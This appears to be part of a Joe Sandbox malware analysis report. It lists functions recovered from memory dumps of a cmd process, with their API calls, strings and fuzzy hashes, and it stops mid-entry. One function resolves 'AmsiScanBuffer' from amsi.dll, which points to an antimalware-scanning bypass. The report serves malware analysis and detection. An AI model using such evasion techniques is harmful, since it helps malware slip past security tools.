                                            Function 00000253FC4035C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 046fbe7a7a53380cf283fc916a2082e09008ada228940b19ccf6e94a6636a737
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: E3319031FC9F5982EA23DF16AD487696BA0BB84BD5F0854208F4847F65EF38D6718704
                                            Function 00000253FC4335C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 9969939ee6733e343f1b725536557de19c8334963863bf494099c7c904d144d5
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 36318F31F49F598AEA22DF16AD4876963A0BBC4BE5F4850308E4807F55EF34D672D704
                                            Function 00000253FC40C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 495ef5a2f674e4ec01d1111ca8450ea6ad0fd88e1e64026a80850e306927ccc6
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 49118231EDCE4882F61BE7316C1D3AE11519B857D2F546628A86756FE6CE38C6214309
                                            Function 00000253FC43C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 4823e9d42af6fb009c280dcd7625abb9b8260089cdd71581ffe43d8e75a430d2
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 17116335E98A4981FA1AE7716C1D36A21515BC47E2FD466349C2756BC6CE38C631E30C
                                            Function 00000253FC401A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 565ba69d1770dfe958d18ff4585ee712fd763cd3809427d5b75715a4111fcc70
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: F1015E31F48E4886E612DB53A85839963A1F788FC1F8840359E9E43B64DF3CC655C744
                                            Function 00000253FC431A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 9ad6eb4a2602da1efdef18f989a1f60a69aeeb72d06c1d309da227052b922219
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 28016D35F48F4882EB11DB12AC5879963A1F788FD2F9840359E5E43B54DE3CCA95C744
                                            Function 00000253FC403E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 9b50bd5c7fbaac5283920e25b597690c77893b0ba23a5d5c71579695fa9b195a
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 66015234E89F4886EB26DB62EC4C35526B0AB45BC2F041024CA9E06B65EF3DC668C748
                                            Function 00000253FC433E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 4dc63d462c43f251940b842a41475abade451eed2df19e2d1d67c434bc0a1555
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 97013C34A49F4882EF26DB21EC4D75532B0AB84B83F141424CE5E06BA5EF3DC268C708
                                            Function 00000253FC401AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 3f3f97ebb23d34517d82dce41771df903cbc1a9b22e44f313d4757244ebf553e
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 7CF08132B88A8C92E722CB21ED883996770F744BC9F8450218A8942D74DF7CC768CB04
                                            Function 00000253FC431AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 1e083ff36067cebc913485dd5f8fe694f236df697e10d4e34c0d9d5cd6ab7c94
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 0EF0A432B48A8892EB21CB21FC887996761F784BCAFD45021CE4942D64DE7CC768CB04
                                            Function 00000253FC40B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: e6d2bb41030fe8d64a41724565bce881e662f9884ac5fc3ff9024df458b93858
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 2DF09631BC9E0981EA13DB259C583991770EB857E2F542219DABA45DF4CF3CC658C708
                                            Function 00000253FC403708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 0a6298a71ec25c15fdb3bd41dcfe449f678b118e7a68b6adc64997ef3c6a8da2
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: B6F05474F98F8C81EA46DB13BD181559651A748FC2F44A030ED5607F24CE78C6658708
                                            Function 00000253FC43B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: dca8a4bf2ae75eff28bc547a055e2b0878789679ab6efe9437d7f8ef7dcb5292
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: B4F06231B89E0981EE16CB149C487991370AB857E2FA422299EBA45DE4CF3CC658C608
                                            Function 00000253FC433708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: a7d7b21a027f42043c60d873f366f04825da23393024157f3560f8a569eb4781
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 16F05474F48F8881EE45DB12BD1C5555251A788FC2F54A031ED1A07F19DF38C6658704
                                            Function 00000253FC431E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 9b43a2dc71a65a5ed06d1777e3838516e3934217c799eb28aded687329b75ed4
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: F5D01234E99D08C1FD1AEB04DC5DB9422616B64BC3FE42025C80A01AA0DE3C4778D748
                                            Function 00000253FC405810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 8a80e15a6f8e452d0494f2695589e28ace3185ae0eeb4f23949a1adaf354b8b0
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: DA02EC32A9DB8886E761CB55F89435ABBA0F3C47D5F101015EA8E87BA8DF7CC554CB08
                                            Function 00000253FC435810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: eca4a3df3ca8ad9657c852040a6c8279c8f014eff4ee3fc7f6487c8c2406ca7b
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 0C021A32A5CB8886E761CB45F89435ABBA0F3C47D5F501025EA8E83BA8DF7CC564DB04
                                            Function 00000253FC402C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 6246c967c5f44e34a9c8cfc0b8e02a991e2bdf68ab1d5470ebfb8935749c002b
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 1251C335BC8E0987E376CB16EC48A5A77A0F784BC2F5050199D5A43FA4DF38CA55CB48
                                            Function 00000253FC432C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: d2fc286aff532b64363d35af44c1c15a241f2722c207909420604d188fdf0bd0
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 5D51E335A48E0487E777CB16AC08A5A73A0F7C8BC2F9050299E1A43F95CF38CA15DB08
                                            Function 00000253FC402AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
